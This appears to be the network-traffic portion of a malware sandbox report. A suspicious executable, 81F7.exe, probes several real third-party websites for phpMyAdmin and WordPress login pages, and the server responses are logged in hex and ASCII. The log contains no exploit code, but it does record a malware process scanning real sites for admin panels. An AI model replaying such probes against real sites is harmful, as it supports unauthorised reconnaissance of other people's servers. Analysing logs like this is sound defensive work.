2024-02-20 23:26:17 UTC	249	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 4d 79 41 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpMyAdmin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.6	50462	81.169.145.86	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	194	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	391	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: private, must-revalidate Link: <https://www.creativ-moebelwerkstaetten.de/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:20 UTC	7801	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 Data Ascii: 2000<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="de-DE" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type
2024-02-20 23:26:20 UTC	397	IN	Data Raw: 32 2e 36 37 2d 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 37 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 Data Ascii: 2.67-7' type='text/css' media='all' /><script type="text/javascript" src="https://www.creativ-moebelwerkstaetten.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script><script type="text/javascript" src="https://www.creativ-moebe
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	5794	IN	Data Raw: 31 36 39 61 0d 0a 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 72 62 74 6f 6f 6c 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 32 30 22 20 69 64 3d 22 74 70 2d 74 6f 6f 6c 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 Data Ascii: 169attps://www.creativ-moebelwerkstaetten.de/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.20" id="tp-tools-js"></script><script type="text/javascript" src="https://www.creativ-moebelwerkstaetten.de/wp-content/plugins/revslider/p
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 39 36 36 0d 0a 72 2d 32 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 35 2c 32 34 35 2c 32 34 35 2c 31 29 3b 7d 2e 68 61 73 2d 61 77 62 2d 63 6f 6c 6f 72 2d 33 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 34 2c 32 33 32 2c 32 33 32 2c 31 29 3b 7d 2e 68 61 73 2d 61 77 62 2d 63 6f 6c 6f 72 2d 33 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 34 2c 32 33 32 2c 32 33 32 2c 31 29 3b 7d 2e 68 61 73 2d 61 77 62 2d 63 6f 6c 6f 72 2d 34 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 31 2c 32 32 31 2c 32 32 31 2c 31 29 3b 7d 2e 68 61 73 2d 61 77 62 2d 63 6f 6c 6f 72 2d 34 2d 62 61 Data Ascii: 966r-2-background-color{background-color:rgba(245,245,245,1);}.has-awb-color-3-color{color:rgba(234,232,232,1);}.has-awb-color-3-background-color{background-color:rgba(234,232,232,1);}.has-awb-color-4-color{color:rgba(221,221,221,1);}.has-awb-color-4-ba
2024-02-20 23:26:20 UTC	2419	IN	Data Raw: 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 66 75 73 69 6f 6e 2d 67 66 6f 6e 74 73 2f 4a 54 55 53 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34 35 39 57 5a 68 79 7a 62 69 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 Data Ascii: elwerkstaetten.de/wp-content/uploads/fusion-gfonts/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	6770	IN	Data Raw: 31 61 36 61 0d 0a 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30 2d 31 45 39 46 2c 20 55 2b 31 45 46 32 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 Data Ascii: 1a6a+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Raleway'; font-style: italic; font-weight: 400; src: url(https://www.creativ-moebelwerkstae
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 35 39 36 0d 0a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 66 75 73 69 6f 6e 2d 67 66 6f 6e 74 73 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 49 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b Data Ascii: 596/@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 400; src: url(https://www.creativ-moebelwerkstaetten.de/wp-content/uploads/fusion-gfonts/1Ptug8zYS_SKggPNyCIIT5lu.woff2) format('woff2'); unicode-range: U+0102-0103, U+
2024-02-20 23:26:20 UTC	1443	IN	Data Raw: 70 6f 72 74 66 6f 6c 69 6f 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 70 6f 73 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 70 6f 73 74 20 2e 66 75 73 69 6f 6e 2d 69 6d 61 67 65 2d 77 72 61 70 70 65 72 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 6f 6e 65 20 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 70 6f 73 74 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 74 77 6f 20 2e 66 75 73 69 6f 6e 2d 70 6f 72 74 66 6f 6c 69 6f 2d 70 6f 73 74 7b 77 69 64 74 68 3a Data Ascii: portfolio-wrapper{display:block}.fusion-portfolio-post{float:left}.fusion-portfolio-post .fusion-image-wrapper{opacity:0}.fusion-portfolio-one .fusion-portfolio-post{overflow:hidden;float:none;width:100%}.fusion-portfolio-two .fusion-portfolio-post{width:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.6	50487	185.39.146.199	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	735	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:17 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=odv897nn5abvlneqq0h2r1au2p; expires=Fri, 10-Jun-2078 22:52:34 GMT; Max-Age=1713655577; path=/; secure; HttpOnly; SameSite=None access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-type: text/html; charset=iso-8859-1 x-backend: server1 x-type: customer x-varnish: 986386937 age: 0 transfer-encoding: chunked x-server: varnish-1 connection: close
2024-02-20 23:26:17 UTC	13761	IN	Data Raw: 33 35 42 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6f 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 20 4d 61 72 6b f8 72 65 6e 20 52 65 6b 6c 61 6d 65 20 41 53 20 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 35B9<!DOCTYPE html><html lang="no"><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title> Markren Reklame AS </title><meta name
2024-02-20 23:26:17 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 61 74 61 2d 66 69 6c 74 65 72 73 3d 22 74 72 75 65 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 73 6f 65 6b 22 20 69 64 3d 22 73 72 63 68 78 76 22 20 6e 61 6d 65 3d 22 78 76 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 76 61 6c 75 65 3d 22 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 f8 6b 20 62 6c 61 6e 64 74 20 31 30 30 30 2d 76 69 73 20 61 76 20 70 72 6f 64 75 6b 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 73 65 61 72 63 68 22 3e 0a 3c 73 70 61 Data Ascii: 5A8ata-filters="true"><input type="hidden" value="soek" id="srchxv" name="xv"><div class="input-group"><input type="text" value="" placeholder="Sk blandt 1000-vis av produkter" class="form-control" autocomplete="off" id="search" name="search"><spa
2024-02-20 23:26:17 UTC	16318	IN	Data Raw: 33 46 42 36 0d 0a 66 66 22 20 69 64 3d 22 6c 69 73 74 66 69 6c 74 65 72 5f 70 72 69 63 65 74 6f 5f 31 39 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 22 3e 0a 3c 73 74 72 6f 6e 67 3e 46 61 72 67 65 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 2d 35 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 62 6f 78 5f 76 65 72 73 69 6f 6e 22 20 76 61 6c 75 65 3d 22 31 39 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 5f 63 6f 6c 6f 72 22 20 76 61 6c 75 65 3d 22 22 3e 3c 69 6e 70 75 74 20 Data Ascii: 3FB6ff" id="listfilter_priceto_19"></div><div class="col-xs-12"><strong>Farge</strong></div><div class="col-xs-12 margin-bottom-5"><input type="hidden" class="searchbox_version" value="19"><input type="hidden" class="filter_color" value=""><input
2024-02-20 23:26:18 UTC	11190	IN	Data Raw: 32 42 41 45 0d 0a 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 61 62 79 62 75 67 7a 22 3e 42 61 62 79 42 75 67 7a 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 61 67 62 61 73 65 22 3e 42 61 67 42 61 73 65 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 65 65 63 68 66 69 65 6c 64 22 3e 42 65 65 63 68 66 69 65 6c 64 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b Data Ascii: 2BAE/li><li><a href="/sortiment/merkevarer/babybugz">BabyBugz®</a></li><li><a href="/sortiment/merkevarer/bagbase">BagBase®</a></li><li><a href="/sortiment/merkevarer/beechfield">Beechfield®</a></li><li><a href="/sortiment/merk
2024-02-20 23:26:18 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 22 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 68 65 61 64 65 72 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 22 20 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 6d 6f 64 61 6c 22 3e 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e d7 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 43 6c 6f 73 65 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 20 69 64 3d 22 63 61 72 74 4c 69 73 74 4d 6f 64 61 6c 4c 61 62 65 6c 22 3e 48 61 6e 64 6c 65 6b 75 72 76 3c 2f 68 34 3e 0a 3c 2f 64 69 76 3e 0a 3c Data Ascii: 5A8"modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal"><span aria-hidden="true"></span><span class="sr-only">Close</span></button><h4 class="modal-title" id="cartListModalLabel">Handlekurv</h4></div><
2024-02-20 23:26:18 UTC	2271	IN	Data Raw: 38 44 33 0d 0a 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 63 6f 64 65 3d 65 2e 77 68 69 63 68 3b 69 66 28 63 6f 64 65 3d 3d 31 33 29 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 63 6f 64 65 3d 3d 31 33 29 7b 20 0a 24 28 27 23 69 6e 64 65 78 53 65 61 72 63 68 46 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 7d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 0a 0a 0a 09 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 65 6c 6c 22 3e 0a 0a 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 Data Ascii: 8D3.keypress(function(e){var code=e.which;if(code==13)e.preventDefault();if(code==13){ $('#indexSearchForm').submit();}});});</script><div class="container"><div class="row"><div class="col-md-12"><div class="well"><h1 style="font-s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.6	50885	75.2.70.75	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	171	OUT	GET /PhpMyAdmin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	182	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/PhpMyAdmin
2024-02-20 23:26:17 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.6	51089	104.21.54.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	814	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h04MO12Nkl%2FJZpkkw%2FgKnU5zLI4u6SPHQ5vLbvoLJYFgsuUTaXpcg%2F9Uq02%2FxubqnUfjdV0fRgsXhekjHs471c9B8S86%2By3ONzxhu%2FDQFNyBOjpcNmKWpHJ4KCtYQOvjF2ALha8V%2F%2F3u6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83803ae9435d-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:18 UTC	555	IN	Data Raw: 31 61 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a06<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
